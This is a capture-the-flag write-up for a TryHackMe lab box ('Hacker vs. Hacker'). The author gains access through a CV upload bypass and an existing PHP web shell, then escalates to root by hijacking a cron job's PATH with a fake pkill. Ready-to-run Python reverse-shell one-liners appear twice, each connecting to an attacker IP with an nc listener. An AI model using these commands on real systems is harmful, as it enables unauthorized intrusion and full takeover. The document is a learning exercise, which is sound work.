CTF : Hacker vs. Hacker

CTF Hacker vs. Hacker writeup. Source THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 24 August 2022

CTF : Hacker vs. Hacker

Informations

  • IP: 10.10.253.199
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p22,80 -A 10.10.253.199
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-23 22:57 CEST
Nmap scan report for 10.10.253.199
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9f:a6:01:53:92:3a:1d:ba:d7:18:18:5c:0d:8e:92:2c (RSA)
|   256 4b:60:dc:fb:92:a8:6f:fc:74:53:64:c1:8c:bd:de:7c (ECDSA)
|_  256 83:d4:9c:d0:90:36:ce:83:f7:c7:53:30:28:df:c3:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: RecruitSec: Industry Leading Infosec Recruitment
|_http-server-header: Apache/2.4.41 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   36.57 ms 10.9.0.1
2   36.65 ms 10.10.253.199

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.63 seconds

Vulnerabilities search

First I went to website and explore source code :

html
<!-- im no security expert - thats what we have a stable of nerds for - but isn't /cvs on the public website a privacy risk? -->

Visibly if you upload your CV you could found it via /cvs

So let's try to upload a php shell

File upload.php has been hacked the hacker seems to be fair and let us some comments : 

html
<!-- seriously, dumb stuff:

$target_dir = "cvs/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);

if (!strpos($target_file, ".pdf")) {
  echo "Only PDF CVs are accepted.";
} else if (file_exists($target_file)) {
  echo "This CV has already been uploaded!";
} else if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
  echo "Success! We will get back to you.";
} else {
  echo "Something went wrong :|";
}

-->

So basically we can't upload files anymore. But the hacker used this exploit surely.

The original code verified if ".pdf" was part of filename. So maybe a file named shell.pdf.php could have been used :)

console
$ curl 10.10.253.199/cvs/shell.pdf.php
<pre></pre>
boom!

Here we go :)

This script may use a parameter with the command to execute. Let's be simple and try cmd : 

console
$ curl "10.10.253.199/cvs/shell.pdf.php?cmd=ls"
<pre>index.html
shell.pdf.php
</pre>
boom!

Alright :)

Exploit

Let's send this parameter :

shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • On attacker box :
shell
nc -nlvp 1234

And we got shell

shell
cat  /home/lachlan/user.txt

Privilege escalation

Enumeration for privesc

By reading /home/lachlan/.bash_history I found the lachlan passwd.

I could use ssh to connect but the hacker throw me out via :

console
$ cat /etc/cron.d/persistence
PATH=/home/lachlan/bin:/bin:/usr/bin
# * * * * * root backup.sh
* * * * * root /bin/sleep 1  && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 11 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 21 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 31 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 41 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done
* * * * * root /bin/sleep 51 && for f in `/bin/ls /dev/pts`; do /usr/bin/echo nope > /dev/pts/$f && pkill -9 -t pts/$f; done

Two things are importants here

  1. PATH env variable : It begins with /home/lachlan/bin
  2. The pkill command which is called without absolute path

So basically, if we create a fake pkill binary in /home/lachlan/bin cron will call this one and our tty won't be killed anymore :)

Exploit

To do that I used this command : 

shell
ssh lachlan@10.10.253.199 -t "touch /home/lachlan/bin/pkill ; chmod +x /home/lachlan/bin/pkill"

After that all we need is to connect using ssh and fill our new pkill script with something usefull :

console
$ vi /home/lachlan/bin/pkill
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • On attacker box :

nc -nlvp 1234

And we are root :) 

console
# cat /root/root.txt

\o/